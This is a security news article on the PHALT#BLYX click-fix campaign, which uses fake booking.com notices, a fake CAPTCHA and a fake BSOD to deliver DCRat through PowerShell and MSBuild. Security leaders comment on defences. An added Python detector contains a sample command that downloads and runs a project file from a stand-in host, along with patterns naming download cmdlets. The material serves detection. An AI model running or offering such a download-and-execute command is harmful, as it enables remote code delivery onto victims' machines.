New Malware Campaign Targeting Hospitality Sector

Securonix researchers warn of a new campaign targeting the hospitality sector, deceiving users into pasting malicious code.
The campaign, tracked as PHALT#BLYX, is a multi-stage infection chain that leverages click-fix social engineering, a fake CAPTCHA, and a fake “blue screen of death” (BSOD). The attackers gain initial access by luring targets with a fake booking.com reservation-cancellation notice.
The booking.com lure contains a link to a fraudulent website. The site presents a fake CAPTCHA, which then gives way to a fake BSOD. “It is a trick for click-fix that executes a PowerShell command to download a proj file,” the research states. “The campaign leverages MSBuild.exe to compile and execute the payload. The final payload is a heavily obfuscated version of DCRat, capable of process hollowing, keylogging, persistent remote access, and dropping secondary payloads.”
According to the research, “The attackers utilize booking.com, a theme that has been abused in the past and remains a persistent threat. The phishing emails notably feature room charge details in Euros, suggesting the campaign is actively targeting European organisations. The use of Russian language within the ‘v.project’ MSBuild file links this activity to Russian threat actors using DCRat.”
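The chain described above (a pasted PowerShell one-liner that fetches a project file and hands it to MSBuild.exe) leaves a distinctive process lineage on the endpoint, which is also the process chain the commentary below suggests blocking. What follows is an added example written for this page, not code from Securonix or from the original article: a small detector run over constructed Sysmon-style process-creation events. The PIDs, paths, user names, the file name v.proj and the URL under example.invalid are all made up for illustration, and the detection rules are the editor's, not the researchers'.

```python
# Added example (not from the Securonix write-up or the article): detection logic for the
# click-fix -> PowerShell -> MSBuild chain, run over constructed process-creation events.
# Every PID, path, user name, file name and URL below is made up for illustration.
import ntpath
import re
import shlex
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
BUILD_TOOL = "msbuild.exe"

# Locations a dropper writes to; a developer's real build almost never lives here.
USER_WRITABLE = re.compile(
    r"\\(appdata\\(local\\temp|roaming)|downloads|programdata|users\\public|windows\\temp)\\",
    re.IGNORECASE,
)
# Switches and cmdlets typical of a pasted "fix": hidden window, no profile, fetch from the web.
DOWNLOAD_MARKERS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-enc(odedcommand)?\b|\biwr\b|invoke-webrequest"
    r"|downloadstring|downloadfile|\bcurl\b",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class ProcEvent:
    """Sysmon Event ID 1 / Security 4688 style process-creation record (constructed)."""
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def lineage(ev: ProcEvent, by_pid: Dict[int, ProcEvent], max_depth: int = 4) -> List[str]:
    """Image basenames of ev's ancestors, nearest first. Real telemetry should key on
    ProcessGuid rather than PID so that PID reuse cannot splice unrelated processes."""
    names, cur = [], ev
    while len(names) < max_depth and cur.ppid in by_pid and cur.ppid != cur.pid:
        cur = by_pid[cur.ppid]
        names.append(basename(cur.image))
    return names


def msbuild_project_arg(cmdline: str) -> Optional[str]:
    """First non-switch argument of msbuild.exe, i.e. the project file it will build."""
    try:
        args = shlex.split(cmdline, posix=False)  # non-POSIX keeps Windows backslashes intact
    except ValueError:
        args = cmdline.split()
    for a in args[1:]:
        a = a.strip('"')
        if a and not a.startswith(("/", "-")):
            return a
    return None


def classify(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Optional[Tuple[str, str]]:
    """(severity, reason) if ev matches one of the chain's detection rules, else None."""
    name = basename(ev.image)
    parents = lineage(ev, by_pid)

    if name == BUILD_TOOL:
        proj = msbuild_project_arg(ev.cmdline)
        if proj and USER_WRITABLE.search(proj):
            return "high", f"msbuild.exe building a project from a user-writable path: {proj}"
        if any(p in SHELLS for p in parents) and any(p in BROWSERS for p in parents):
            return "high", f"msbuild.exe reached from a browser through a shell: {parents}"
        return None

    if name in SHELLS and parents and DOWNLOAD_MARKERS.search(ev.cmdline):
        if parents[0] in BROWSERS:
            return "high", f"{parents[0]} spawned {name} with download/hidden-window switches"
        if parents[0] == "explorer.exe":
            # A Win+R paste shows explorer.exe, not the browser, as PowerShell's parent.
            return "medium", f"explorer.exe (Run dialog?) spawned {name} with download switches"
    return None


def scan(events: Iterable[ProcEvent]) -> List[Tuple[int, str, str]]:
    evs = list(events)
    by_pid = {e.pid: e for e in evs}
    hits = []
    for e in evs:
        verdict = classify(e, by_pid)
        if verdict:
            hits.append((e.pid, verdict[0], verdict[1]))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSB = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
STAGE1 = ('powershell.exe -w hidden -nop -c "iwr http://example.invalid/v.proj '
          '-OutFile $env:TEMP\\v.proj; & MSBuild.exe $env:TEMP\\v.proj"')

SAMPLE_EVENTS = [  # constructed telemetry, not captured from the campaign
    ProcEvent(4, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(100, 4, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", "msedge.exe"),
    # Victim A: the chain as the commentary describes it, browser -> PowerShell -> MSBuild.
    ProcEvent(200, 100, PS, STAGE1),
    ProcEvent(300, 200, MSB, r'MSBuild.exe "C:\Users\alice\AppData\Local\Temp\v.proj"'),
    # Victim B pasted the same line into Win+R, so explorer.exe is the parent, not the browser.
    ProcEvent(210, 4, PS, STAGE1),
    ProcEvent(310, 210, MSB, r'MSBuild.exe "C:\Users\bob\AppData\Local\Temp\v.proj"'),
    # Benign: Visual Studio building a project from a source tree.
    ProcEvent(500, 4, r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe", "devenv.exe"),
    ProcEvent(600, 500, MSB, r'MSBuild.exe "C:\src\app\app.csproj" /t:Build'),
    # Benign: an interactive PowerShell session from the Start menu.
    ProcEvent(700, 4, PS, "powershell.exe"),
]

if __name__ == "__main__":
    for pid, sev, why in scan(SAMPLE_EVENTS):
        print(f"[{sev:6}] pid {pid}: {why}")
```

Two rules carry the weight. The downloaded project file has to land somewhere the victim can write, so MSBuild.exe building a project under Temp, AppData, Downloads or ProgramData is the most robust signal and fires regardless of who the parent is; a shell started with hidden-window or download switches directly under a browser is the second. The Win+R case matters: when the victim pastes into the Run dialog, explorer.exe rather than the browser appears as PowerShell's parent, so a rule that only looks for browser → PowerShell misses it, which is why the example scores that case separately instead of dropping it.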
Below, security leaders discuss this new malware campaign.
Security Leaders Weigh In
Christopher Jess, Senior R&D Manager at Black Duck:
This PHALT#BLYX activity is a good example of where attackers don’t require a vulnerability for exploitation. By combining a fake booking.com cancellation lure with a bogus CAPTCHA and a panic-inducing BSOD, the campaign uses the click-fix pattern to coax a user into running PowerShell themselves, then leans on built-in tools by abusing trusted Windows tooling like MSBuild.exe to compile and run the next stage. That blend of social engineering plus utilizing legitimate binaries is specifically designed to slip past conventional controls that are tuned for clearly malicious executables.
Organizations should assume this technique will spread. Click-fix has already shown broad adoption across threat actors, lures, and geographies because it’s low cost to retheme and it relies on user execution rather than a single vulnerable product. What looks like a hospitality (booking.com) problem today can become shipping, HR or finance tomorrow with the same playbook.
So, how do we fight back? Security teams need to break the attack chain where they have the most control: people, privileges, and permitted tools. Train everyone not to run commands just because a web page or verification screen says so. Remind everyone to only check reservations or refunds through the real booking portal or by calling a trusted number. Lock things down further by only allowing developer tools (like MSBuild) on systems that need them, cut back on local admin rights, ensure strong logging, and use tooling to block risky scripts and suspicious process chains (like a browser suddenly launching PowerShell and then MSBuild).
Finally, treat RAT deployment as an incident with follow-on risk. These tools usually mean someone’s poking around, stealing credentials, or setting up more attacks. Be ready to look for signs like unexpected Defender settings, persistence via Startup folder entries, anomalous MSBuild activity, or unexpected outbound traffic. Move fast to quarantine infected machines and reset credentials.
Note that the campaign targeted European hospitality in late December 2025, timing and sector selection that reinforce how attackers know when to strike for maximum impact.
Kern Smith, Senior Vice President of Global Solutions Engineering at Zimperium:
Campaigns such as this highlight how attackers increasingly rely on social engineering and trusted brand impersonation to bypass traditional controls, and these tactics don’t stop at desktops. We routinely see the same lures adapted for mobile delivery, where phishing links, fake CAPTCHAs, and malicious redirects are even harder for users to detect. As attackers refine these deception-based techniques, organizations should assume global spread is inevitable and focus on protecting the device itself. Security teams need continuous, on-device threat detection that can identify malicious links, command execution attempts, and post-click behavior in real time, especially on mobile endpoints that sit outside the visibility of legacy email and network defenses.
Attackers are using techniques like click-fix and fake system errors because they exploit human behavior and the gaps created as work increasingly happens on mobile devices. A mobile-first attack strategy allows threat actors to bypass traditional perimeter, email, and network defenses by pushing users to interact directly with malicious content on their phones, where visibility and enforcement are often weaker. By combining trusted brand lures, browser-based deception, and post-click execution, attackers can scale these campaigns globally with a higher success rate and lower risk of detection.
Lionel Litty, Chief Information Security Officer and Chief Security Architect at Menlo Security:
Displaying a fullscreen BSOD is a key part of tricking the user here. Perhaps surprisingly, a website can enter fullscreen mode without requiring a browser permission prompt. The only prerequisite is a user action that demonstrates the user is interacting with the page. In this attack, this is achieved by having the user click “Reload” on the first fake error page. This serves as a stark reminder of the security risks that come with browsers exposing powerful APIs to untrusted web pages.